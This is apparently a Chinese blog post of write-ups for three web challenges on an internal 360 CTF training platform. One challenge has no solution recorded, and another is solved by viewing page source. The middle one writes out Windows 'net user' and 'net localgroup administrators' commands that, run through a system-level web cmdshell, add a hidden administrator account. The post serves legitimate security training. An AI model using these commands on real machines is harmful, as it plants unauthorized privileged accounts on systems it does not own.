360CTF 实训平台:http://172.18.25.55

仅限内网访问

# 360-SecLab-Web-01

# 菜刀的相册

# 题目描述

进入题目页面,发现与上面 MySQL 一样,同样是通过 $_GET [id] 传参

题目网址:http://10.2.0.18/7/

# Write-up

MySQL 注入,暂时没有成功,各位可以自行尝试一下

# 这是黑阔们经常干的事

# 题目描述

本题考察的是 windows 下 cmd 相关命令的使用。

题目网址:http://10.2.0.18/8/index.asp

# Write-up

这是菜刀大牛的服务器的 cmdshell,而且还是 system 权限,不信你可以输入 whoami 试试

据调查,他服务器的系统是 Windows 系统,请你添加一个管理员用户!

# 添加管理员账户 lalala,密码 123456
net user lalala 123456 /add
# 将用户 lalala 提升为管理员用户
net localgroup administrators lalala /add

用刚创建的账号密码登录 http://10.2.0.18/8/check.asp,获取 key

# 老规矩,你懂的

# 题目描述

简单的 web 代码隐藏 key 的题目。

题目网址:http://10.2.0.3/14/

# Write-up

浏览器打开题目地址,按 F12 查看源码,这不就是吗。。。

key

Edited on Views times

Give me a cup of [coffee]~( ̄▽ ̄)~*

Harold WeChat Pay

WeChat Pay

Harold Alipay

Alipay